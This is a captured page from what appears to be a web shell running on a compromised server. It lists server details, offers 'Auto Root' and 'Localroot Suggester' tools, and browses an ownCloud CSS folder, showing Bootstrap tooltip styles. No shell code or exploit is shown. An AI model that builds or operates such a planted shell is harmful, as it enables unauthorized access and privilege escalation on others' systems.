Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
core /
css /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
lostpassword
[ DIR ]
drwxr-xr-x
2018-04-19 18:15
apps.css
15.1
KB
-rw-r--r--
2018-04-19 18:15
fixes.css
357
B
-rw-r--r--
2018-04-19 18:15
fonts.css
728
B
-rw-r--r--
2018-04-19 18:15
global.css
919
B
-rw-r--r--
2018-04-19 18:15
header.css
7.83
KB
-rw-r--r--
2018-04-19 18:15
icons.css
8.81
KB
-rw-r--r--
2018-04-19 18:15
inputs.css
9.11
KB
-rw-r--r--
2018-04-19 18:15
jquery-ui-fixes.css
3.54
KB
-rw-r--r--
2018-04-19 18:15
jquery.ocdialog.css
2.92
KB
-rw-r--r--
2018-04-19 18:15
mobile.css
3
KB
-rw-r--r--
2018-04-19 18:15
multiselect.css
2.42
KB
-rw-r--r--
2018-04-19 18:15
share.css
4.89
KB
-rw-r--r--
2018-04-19 18:15
styles.css
21.57
KB
-rw-r--r--
2018-04-19 18:15
systemtags.css
2.59
KB
-rw-r--r--
2018-04-19 18:15
tooltip.css
2.27
KB
-rw-r--r--
2018-04-19 18:15
update.css
363
B
-rw-r--r--
2018-04-19 18:15
Save
Rename
/*! * Bootstrap v3.3.6 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ .tooltip { position: absolute; z-index: 1070; display: block; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; font-style: normal; font-weight: normal; line-height: 1.42857143; text-align: left; text-align: start; text-decoration: none; text-shadow: none; text-transform: none; letter-spacing: normal; word-break: normal; word-spacing: normal; word-wrap: normal; white-space: normal; filter: alpha(opacity=0); opacity: 0; line-break: auto; } .tooltip.in { filter: alpha(opacity=90); opacity: .9; } .tooltip.top { padding: 5px 0; margin-top: -3px; } .tooltip.right { padding: 0 5px; margin-left: 3px; } .tooltip.bottom { padding: 5px 0; margin-top: 3px; } .tooltip.left { padding: 0 5px; margin-left: -3px; } .tooltip-inner { max-width: 200px; padding: 3px 8px; color: #fff; text-align: center; background-color: #000; border-radius: 4px; } .tooltip-arrow { position: absolute; width: 0; height: 0; border-color: transparent; border-style: solid; } .tooltip.top .tooltip-arrow { bottom: 0; left: 50%; margin-left: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.top-left .tooltip-arrow { right: 5px; bottom: 0; margin-bottom: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.top-right .tooltip-arrow { bottom: 0; left: 5px; margin-bottom: -5px; border-width: 5px 5px 0; border-top-color: #000; } .tooltip.right .tooltip-arrow { top: 50%; left: 0; margin-top: -5px; border-width: 5px 5px 5px 0; border-right-color: #000; } .tooltip.left .tooltip-arrow { top: 50%; right: 0; margin-top: -5px; border-width: 5px 0 5px 5px; border-left-color: #000; } .tooltip.bottom .tooltip-arrow { top: 0; left: 50%; margin-left: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .tooltip.bottom-left .tooltip-arrow { top: 0; right: 5px; margin-top: -5px; border-width: 0 5px 5px; border-bottom-color: #000; } .tooltip.bottom-right .tooltip-arrow { top: 0; left: 5px; margin-top: -5px; border-width: 0 5px 5px; border-bottom-color: #000; }